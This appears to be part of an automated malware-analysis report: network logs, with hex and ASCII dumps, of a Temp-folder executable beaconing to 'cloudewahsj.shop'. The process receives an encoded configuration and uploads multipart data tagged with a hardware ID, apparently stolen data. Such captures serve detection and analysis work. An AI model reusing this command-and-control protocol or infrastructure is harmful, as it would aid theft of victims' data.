2025-01-04 14:33:20 UTC	798	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCvIOYyAwCSJiiNSSI9ljXfZN8tkHcFU0MgTa3ZAqfvyDwrVXrbLZFk0v0L6J%2FRrz2k6ApET6axLZKfwvcsgwOTopFKdtHeb3ovWlJKnoEE%2BCOgxnaNr2g8htSR8PE3A7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf170687543e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1547&rtt_var=588&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=1850443&cwnd=229&unsent_bytes=0&cid=52f5db77458440e0&ts=468&x=0"
2025-01-04 14:33:20 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-04 14:33:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	104.21.48.1	443	1036	C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:29 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cloudewahsj.shop
2025-01-04 14:33:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-04 14:33:30 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fku8c2p7uqung90hp903trf46m; expires=Wed, 30 Apr 2025 08:20:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCjkUKMhCA4DQ0FUfN%2BivGe9cU9D5C87%2FVs%2F8vHlqNVGHbisEcQgB3JIvEt2xC%2BtA3nOqCx97pa9QwMKdyZzebgZRxO9Us1k3cuiAxACrh%2F5BLDrycefrUTAGpZMMg0XpNPl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1aa3d528c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1775&rtt_var=674&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=907&delivery_rate=1612368&cwnd=238&unsent_bytes=0&cid=92e52d4a8918bbd6&ts=470&x=0"
2025-01-04 14:33:30 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-04 14:33:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	104.21.48.1	443	1036	C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:30 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: cloudewahsj.shop
2025-01-04 14:33:30 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-04 14:33:31 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n4gvd2v8vp4evcrtknu6m599tk; expires=Wed, 30 Apr 2025 08:20:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAe3XZju7bxljWlsrleJI%2FubJEccO0Np0U1%2BPhGGrat%2FnKfq%2Fha1Z5wcnfpKXGpOznQEscZu%2F%2BM9%2B%2Buq4r5aXgtgPQF8VtR3xZdQj1imlY94mttcJWzmUXQgOyWNckPgyS6D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1afff05c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1518&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=974&delivery_rate=1898569&cwnd=214&unsent_bytes=0&cid=e8f127bd8b054ff1&ts=522&x=0"
2025-01-04 14:33:31 UTC	238	IN	Data Raw: 34 36 63 0d 0a 33 48 59 61 67 38 74 53 63 58 6e 34 4e 49 42 31 37 69 46 46 38 48 6f 6c 34 6b 46 32 38 59 44 55 55 30 78 77 35 47 37 31 52 43 43 6e 56 47 79 68 38 57 5a 64 57 34 74 52 6f 6b 2b 61 55 7a 43 56 56 67 65 44 4a 56 54 4c 35 72 55 2f 50 78 58 49 54 49 4d 70 41 75 59 51 65 2b 2b 34 4e 31 31 62 6e 55 79 69 54 37 56 61 5a 35 55 55 42 39 68 6a 45 35 76 69 74 54 38 75 45 59 38 42 68 53 68 44 74 42 70 39 36 36 34 78 46 52 69 55 57 65 55 51 69 30 41 76 6e 68 4e 49 69 69 78 55 33 61 4b 78 4b 57 35 4b 78 69 4f 51 4d 45 47 52 46 32 6e 6f 36 53 39 64 41 74 70 52 37 6c 66 55 41 79 53 56 47 45 6d 45 4a 52 32 5a 36 4c 77 33 4c 78 53 4f 48 70 77 69 53 4c 51 55 66 75 71 6b 4f 41 45 56 6e 6c 37 75 46 6f 46 41 5a Data Ascii: 46c3HYag8tScXn4NIB17iFF8Hol4kF28YDUU0xw5G71RCCnVGyh8WZdW4tRok+aUzCVVgeDJVTL5rU/PxXITIMpAuYQe++4N11bnUyiT7VaZ5UUB9hjE5vitT8uEY8BhShDtBp9664xFRiUWeUQi0AvnhNIiixU3aKxKW5KxiOQMEGRF2no6S9dAtpR7lfUAySVGEmEJR2Z6Lw3LxSOHpwiSLQUfuqkOAEVnl7uFoFAZ
2025-01-04 14:33:31 UTC	901	IN	Data Raw: 39 78 59 51 4a 68 6a 54 4e 4f 78 68 44 49 2f 41 35 4d 42 68 79 41 43 6f 56 70 68 6f 61 34 38 55 30 50 61 58 75 34 5a 69 55 41 6f 6c 52 6c 48 6b 69 77 55 6b 4f 71 2b 4e 53 51 64 69 51 4f 5a 4c 45 57 32 48 58 2f 75 72 6a 67 56 46 4a 6b 57 72 46 65 4c 57 32 66 4b 57 47 65 51 49 42 65 48 37 36 64 78 4d 56 79 66 54 4a 41 71 41 75 5a 55 66 75 2b 6f 50 52 4d 4a 6b 6c 33 70 45 70 35 49 4c 70 38 56 52 34 30 70 47 35 44 69 73 54 73 6b 48 59 77 49 6d 69 74 45 76 68 51 34 72 2b 6b 33 43 31 76 43 46 73 45 53 6e 45 51 72 68 46 70 39 77 44 78 61 69 71 4b 78 50 57 35 4b 78 67 53 53 4a 55 47 31 47 33 76 70 6f 69 49 54 43 5a 78 62 35 77 57 4b 52 69 6d 59 47 31 57 4b 4c 52 4b 51 36 37 30 34 4b 78 57 43 54 4e 6c 6d 52 61 5a 55 49 4b 47 49 50 52 67 58 6b 45 48 69 56 35 4d 4e Data Ascii: 9xYQJhjTNOxhDI/A5MBhyACoVphoa48U0PaXu4ZiUAolRlHkiwUkOq+NSQdiQOZLEW2HX/urjgVFJkWrFeLW2fKWGeQIBeH76dxMVyfTJAqAuZUfu+oPRMJkl3pEp5ILp8VR40pG5DisTskHYwImitEvhQ4r+k3C1vCFsESnEQrhFp9wDxaiqKxPW5KxgSSJUG1G3vpoiITCZxb5wWKRimYG1WKLRKQ6704KxWCTNlmRaZUIKGIPRgXkEHiV5MN
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 34 38 32 34 0d 0a 53 59 63 31 56 49 79 73 72 33 45 70 48 73 5a 55 31 79 6c 4e 73 52 78 34 34 4b 30 39 46 78 71 58 57 75 73 55 67 45 38 76 6e 78 52 44 6a 79 73 63 6b 4f 71 6b 50 79 41 55 67 41 79 53 5a 67 7a 2b 45 32 43 68 38 58 41 33 46 59 31 43 36 56 57 35 51 43 6d 63 48 31 48 41 50 46 71 4b 6f 72 45 39 62 6b 72 47 41 70 6f 74 54 72 6b 64 65 65 4b 70 4f 68 30 55 6b 46 37 71 46 34 46 43 4c 4a 6f 65 53 6f 73 73 47 35 54 71 74 54 30 72 48 34 56 4d 32 57 5a 46 70 6c 51 67 6f 59 77 2b 45 41 71 4c 46 4e 63 55 67 6b 30 67 68 46 68 59 7a 6a 70 55 6c 4f 37 32 61 57 34 59 67 51 75 54 4b 30 69 39 45 48 7a 73 70 6a 6b 61 45 6f 68 63 37 68 6d 65 54 69 32 58 46 6b 75 46 4c 42 53 53 34 37 67 37 4a 56 4c 49 54 4a 41 2b 41 75 5a 55 56 2b 79 35 49 68 6b 51 69 78 54 58 46 Data Ascii: 4824SYc1VIysr3EpHsZU1ylNsRx44K09FxqXWusUgE8vnxRDjysckOqkPyAUgAySZgz+E2Ch8XA3FY1C6VW5QCmcH1HAPFqKorE9bkrGApotTrkdeeKpOh0UkF7qF4FCLJoeSossG5TqtT0rH4VM2WZFplQgoYw+EAqLFNcUgk0ghFhYzjpUlO72aW4YgQuTK0i9EHzspjkaEohc7hmeTi2XFkuFLBSS47g7JVLITJA+AuZUV+y5IhkQixTXF
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 4b 57 47 69 44 4e 52 37 54 2f 66 67 6f 62 68 57 4b 54 4d 39 6d 53 4c 49 51 65 2b 32 67 50 42 34 61 6e 6c 48 76 45 34 78 46 49 5a 63 5a 54 49 67 76 47 35 6e 75 73 6a 30 6e 46 49 6f 50 6c 43 41 43 38 46 52 2f 2b 65 6c 6f 55 7a 71 58 58 65 34 58 6a 31 49 67 30 6c 59 48 6a 69 55 55 30 37 71 67 49 54 6b 56 6d 55 4b 4f 5a 6b 57 79 56 43 43 68 6f 79 49 57 46 5a 35 63 35 78 4f 41 53 53 65 58 43 6b 2b 47 4a 42 69 62 35 37 6b 33 4b 78 2b 42 42 35 51 30 55 4c 30 51 64 75 33 70 66 6c 4d 63 67 68 61 36 56 36 6c 55 4a 49 49 65 52 4d 41 38 57 6f 71 69 73 54 31 75 53 73 59 4d 6d 53 70 4a 75 52 39 7a 35 61 30 77 48 68 43 55 57 4f 73 62 68 45 38 67 67 42 56 43 69 43 6b 64 6c 75 36 37 4d 6a 77 52 68 30 7a 5a 5a 6b 57 6d 56 43 43 68 6a 67 4d 6b 4f 4e 70 4a 72 41 37 4d 52 43 Data Ascii: KWGiDNR7T/fgobhWKTM9mSLIQe+2gPB4anlHvE4xFIZcZTIgvG5nusj0nFIoPlCAC8FR/+eloUzqXXe4Xj1Ig0lYHjiUU07qgITkVmUKOZkWyVCChoyIWFZ5c5xOASSeXCk+GJBib57k3Kx+BB5Q0UL0Qdu3pflMcgha6V6lUJIIeRMA8WoqisT1uSsYMmSpJuR9z5a0wHhCUWOsbhE8ggBVCiCkdlu67MjwRh0zZZkWmVCChjgMkONpJrA7MRC
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 72 43 41 62 6d 4b 4b 70 66 7a 64 53 67 51 44 58 66 67 4b 35 48 48 44 76 71 6a 59 59 46 35 5a 58 36 78 47 4a 53 79 43 64 48 30 36 48 49 78 4b 42 35 62 73 34 4c 68 6d 50 42 70 4d 6e 53 66 35 61 4f 4f 61 78 63 45 74 62 71 46 48 30 42 34 38 44 4f 4e 77 42 42 34 63 76 56 4d 75 69 75 79 4d 76 46 35 51 49 6d 43 31 51 74 52 4a 34 35 4c 73 33 48 78 47 56 56 65 6f 61 6a 30 73 31 6b 68 56 48 6b 6a 45 53 6d 4f 7a 32 66 32 34 56 6e 6b 7a 50 5a 6e 4f 70 48 7a 6a 2b 35 79 6c 54 48 4a 59 57 75 6c 65 50 53 53 71 63 43 6b 4f 47 4b 42 65 64 36 72 4d 35 4b 68 69 4c 41 35 77 73 53 37 59 55 64 2b 53 68 4f 78 55 56 6d 31 44 75 47 73 77 4e 5a 35 55 41 42 39 68 6a 4d 34 6e 76 73 43 59 2f 4a 34 45 4d 78 6d 5a 64 38 41 30 34 35 71 56 77 53 31 75 58 57 75 67 61 69 55 63 76 6c 52 74 Data Ascii: rCAbmKKpfzdSgQDXfgK5HHDvqjYYF5ZX6xGJSyCdH06HIxKB5bs4LhmPBpMnSf5aOOaxcEtbqFH0B48DONwBB4cvVMuiuyMvF5QImC1QtRJ45Ls3HxGVVeoaj0s1khVHkjESmOz2f24VnkzPZnOpHzj+5ylTHJYWulePSSqcCkOGKBed6rM5KhiLA5wsS7YUd+ShOxUVm1DuGswNZ5UAB9hjM4nvsCY/J4EMxmZd8A045qVwS1uXWugaiUcvlRt
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 4a 54 75 39 6d 6c 75 48 49 73 4b 6c 69 64 4b 74 68 52 2b 36 36 30 7a 47 68 69 64 58 2b 51 63 6a 30 6b 6f 6c 52 35 44 67 43 67 54 6e 65 53 7a 4f 69 64 53 79 45 79 51 50 67 4c 6d 56 46 37 43 75 79 49 68 46 5a 6c 4e 6f 67 6a 43 57 6d 65 56 46 41 66 59 59 78 2b 62 37 61 51 30 4a 78 71 43 42 5a 63 69 53 4c 4d 54 65 4f 53 6b 4e 52 63 56 6e 6c 48 69 47 34 4e 45 4c 35 30 63 52 34 39 6a 57 74 50 6c 72 6e 46 32 55 71 59 48 67 51 64 4d 74 51 59 34 2f 75 63 70 55 78 79 57 46 72 70 58 67 6b 6f 6d 6d 68 5a 4c 69 43 63 47 6b 2b 6d 2f 50 69 38 64 68 67 2b 57 4c 45 71 73 45 6e 6a 71 6f 54 63 62 48 35 52 45 34 78 6a 4d 44 57 65 56 41 41 66 59 59 79 57 46 35 62 45 2b 62 44 75 42 46 35 59 73 51 62 55 59 4f 50 37 6e 4b 56 4d 63 6c 68 61 36 56 34 46 50 4b 70 59 4b 53 34 41 6a Data Ascii: JTu9mluHIsKlidKthR+660zGhidX+Qcj0kolR5DgCgTneSzOidSyEyQPgLmVF7CuyIhFZlNogjCWmeVFAfYYx+b7aQ0JxqCBZciSLMTeOSkNRcVnlHiG4NEL50cR49jWtPlrnF2UqYHgQdMtQY4/ucpUxyWFrpXgkommhZLiCcGk+m/Pi8dhg+WLEqsEnjqoTcbH5RE4xjMDWeVAAfYYyWF5bE+bDuBF5YsQbUYOP7nKVMclha6V4FPKpYKS4Aj
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 59 36 49 42 65 48 41 4a 30 68 54 4b 77 56 63 75 32 6f 4e 78 51 51 69 46 33 77 48 49 52 41 4b 5a 6f 52 52 34 34 6a 46 5a 37 69 39 6e 39 75 46 5a 35 4d 7a 32 5a 6e 6e 51 4e 75 36 2b 73 54 42 41 32 51 55 65 34 42 68 30 49 6b 68 42 56 58 77 47 31 55 67 75 57 6e 63 58 59 45 6c 68 75 51 4f 51 79 6e 56 48 2f 74 36 57 68 54 45 4a 56 59 37 78 79 49 53 69 4b 61 47 30 4b 46 4b 52 69 66 34 37 34 34 4a 42 65 44 43 70 30 6c 54 4c 45 56 64 4f 57 67 50 68 70 62 31 42 62 6c 44 38 77 62 5a 36 51 49 51 4a 67 75 42 4e 48 51 74 53 41 2f 42 34 73 63 6b 57 52 74 76 52 68 37 35 4b 34 67 55 77 54 55 54 36 49 51 67 41 4e 2f 30 68 68 44 6a 43 41 54 6e 65 32 37 50 69 6b 5a 69 51 61 5a 4e 45 32 37 48 48 54 70 70 43 49 5a 45 59 68 66 36 78 71 43 53 7a 57 52 57 41 6e 41 4a 41 7a 54 75 Data Ascii: Y6IBeHAJ0hTKwVcu2oNxQQiF3wHIRAKZoRR44jFZ7i9n9uFZ5Mz2ZnnQNu6+sTBA2QUe4Bh0IkhBVXwG1UguWncXYElhuQOQynVH/t6WhTEJVY7xyISiKaG0KFKRif4744JBeDCp0lTLEVdOWgPhpb1BblD8wbZ6QIQJguBNHQtSA/B4sckWRtvRh75K4gUwTUT6IQgAN/0hhDjCATne27PikZiQaZNE27HHTppCIZEYhf6xqCSzWRWAnAJAzTu
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 73 75 43 79 63 4d 45 4f 7a 48 33 54 66 6c 79 55 51 46 5a 52 52 39 41 62 4d 44 57 65 64 57 42 2b 35 59 31 7a 54 33 66 68 78 4e 6c 4c 65 54 4b 49 6c 54 4c 41 54 62 76 44 6b 45 42 67 4e 6d 31 76 70 47 38 35 43 4b 6f 49 66 42 38 35 6a 45 74 4f 36 35 6e 39 75 46 70 64 4d 7a 33 59 51 35 55 45 72 74 76 6c 69 44 46 57 44 46 76 52 58 31 42 46 70 30 67 6f 48 32 47 4e 54 6b 50 43 6b 4e 79 30 45 68 55 75 70 47 47 4b 31 47 48 76 74 71 44 64 54 56 64 70 5a 6f 6b 2b 31 41 79 53 41 43 67 69 52 4e 52 6d 44 35 66 6f 35 50 78 2b 4b 54 4e 6c 6d 44 72 6f 66 64 4f 53 75 49 46 77 4a 69 6c 33 75 41 63 42 48 4e 64 4a 57 42 35 45 6f 47 34 48 73 73 58 34 2f 42 49 73 63 6c 43 4e 46 38 68 78 70 37 4b 56 77 58 56 75 50 58 65 34 52 67 56 5a 6f 67 77 35 45 6c 69 52 59 6d 2f 4f 37 50 57 Data Ascii: suCycMEOzH3TflyUQFZRR9AbMDWedWB+5Y1zT3fhxNlLeTKIlTLATbvDkEBgNm1vpG85CKoIfB85jEtO65n9uFpdMz3YQ5UErtvliDFWDFvRX1BFp0goH2GNTkPCkNy0EhUupGGK1GHvtqDdTVdpZok+1AySACgiRNRmD5fo5Px+KTNlmDrofdOSuIFwJil3uAcBHNdJWB5EoG4HssX4/BIsclCNF8hxp7KVwXVuPXe4RgVZogw5EliRYm/O7PW
2025-01-04 14:33:31 UTC	1369	IN	Data Raw: 6a 32 59 61 2f 69 46 37 37 36 63 33 42 51 72 58 63 4f 45 51 69 6b 41 70 68 51 6b 48 7a 6d 4d 53 30 37 72 6b 66 32 34 57 6c 30 7a 50 64 68 44 6c 51 53 75 32 2b 57 49 4d 56 59 4d 57 39 46 66 55 45 47 6e 53 43 67 66 59 59 31 4f 64 37 37 63 79 49 42 47 55 48 70 45 6c 56 4c 31 54 52 74 2b 4d 50 52 34 65 6c 46 48 63 4b 61 31 4a 4e 35 38 58 51 4c 34 64 49 34 4c 6c 70 6e 4d 49 45 5a 41 50 31 32 67 43 70 6c 51 67 6f 59 67 36 41 78 61 56 55 61 4a 5a 7a 45 64 6e 79 6c 68 69 6a 53 34 52 6e 65 58 30 45 43 51 43 69 77 4f 51 5a 67 7a 2b 47 44 69 35 36 54 45 5a 43 35 64 5a 35 56 75 4c 57 53 44 53 56 67 65 4f 59 30 7a 54 34 37 77 68 49 78 32 42 51 4a 45 6f 54 50 34 4c 4e 76 6a 70 4a 6c 4e 44 79 52 69 69 42 63 77 62 5a 39 55 57 53 6f 45 67 47 70 44 77 70 44 63 74 42 49 56 Data Ascii: j2Ya/iF776c3BQrXcOEQikAphQkHzmMS07rkf24Wl0zPdhDlQSu2+WIMVYMW9FfUEGnSCgfYY1Od77cyIBGUHpElVL1TRt+MPR4elFHcKa1JN58XQL4dI4LlpnMIEZAP12gCplQgoYg6AxaVUaJZzEdnylhijS4RneX0ECQCiwOQZgz+GDi56TEZC5dZ5VuLWSDSVgeOY0zT47whIx2BQJEoTP4LNvjpJlNDyRiiBcwbZ9UWSoEgGpDwpDctBIV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	104.21.48.1	443	1036	C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:32 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2CAQHOM2KJJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12799 Host: cloudewahsj.shop
2025-01-04 14:33:32 UTC	12799	OUT	Data Raw: 2d 2d 32 43 41 51 48 4f 4d 32 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 38 33 46 33 35 45 37 34 36 31 42 31 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 32 43 41 51 48 4f 4d 32 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 43 41 51 48 4f 4d 32 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 32 43 41 51 48 4f 4d 32 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --2CAQHOM2KJJContent-Disposition: form-data; name="hwid"A083F35E7461B14A822D1F4978021086--2CAQHOM2KJJContent-Disposition: form-data; name="pid"2--2CAQHOM2KJJContent-Disposition: form-data; name="lid"4h5VfH----2CAQHOM2KJJContent-D
2025-01-04 14:33:32 UTC	1126	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9ce8a960euis2i5guafca7v7gn; expires=Wed, 30 Apr 2025 08:20:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6z4Flz61Tb36pJDNHfoZ%2FBxmSrizEs48IjVCvD%2BW2rgKUWYcv17Knf8omHWDzgdI9tIPpfCD0cEZMs7HgsMAh29gNagYUJraTQZSqn4K2nE48%2FHQ5VP6%2Fix2BHBtqrM18I1V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1b83f37c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1537&rtt_var=586&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13732&delivery_rate=1899804&cwnd=214&unsent_bytes=0&cid=b14cbaae9e064463&ts=559&x=0"
2025-01-04 14:33:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 14:33:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49714	104.21.48.1	443	1036	C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:33 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9Q1YI2VH1T User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15022 Host: cloudewahsj.shop
2025-01-04 14:33:33 UTC	15022	OUT	Data Raw: 2d 2d 39 51 31 59 49 32 56 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 38 33 46 33 35 45 37 34 36 31 42 31 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 39 51 31 59 49 32 56 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 51 31 59 49 32 56 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 39 51 31 59 49 32 56 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --9Q1YI2VH1TContent-Disposition: form-data; name="hwid"A083F35E7461B14A822D1F4978021086--9Q1YI2VH1TContent-Disposition: form-data; name="pid"2--9Q1YI2VH1TContent-Disposition: form-data; name="lid"4h5VfH----9Q1YI2VH1TContent-Dispo
2025-01-04 14:33:33 UTC	1120	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ltjg54h75bppikru3vo65h81kr; expires=Wed, 30 Apr 2025 08:20:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Io08kBCtjJLWJW8BRmsf9oBo6Qc8e7ukh95OAQxjmAQXsKMfpIcpNc%2FMAOtiX7VjeNoVSFADIOQiKcTyi7iTTPSCLi2PC8jTRUcjSa9Y67gSGqHDvrJNwrFoJ6wWAyr6RM5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1bf8f9543be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1542&rtt_var=592&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15954&delivery_rate=1826141&cwnd=226&unsent_bytes=0&cid=f082d3a0c6c68157&ts=503&x=0"
2025-01-04 14:33:33 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 14:33:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49717	104.21.48.1	443	1036	C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:35 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6ZVS3HMZK6EF2E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20213 Host: cloudewahsj.shop
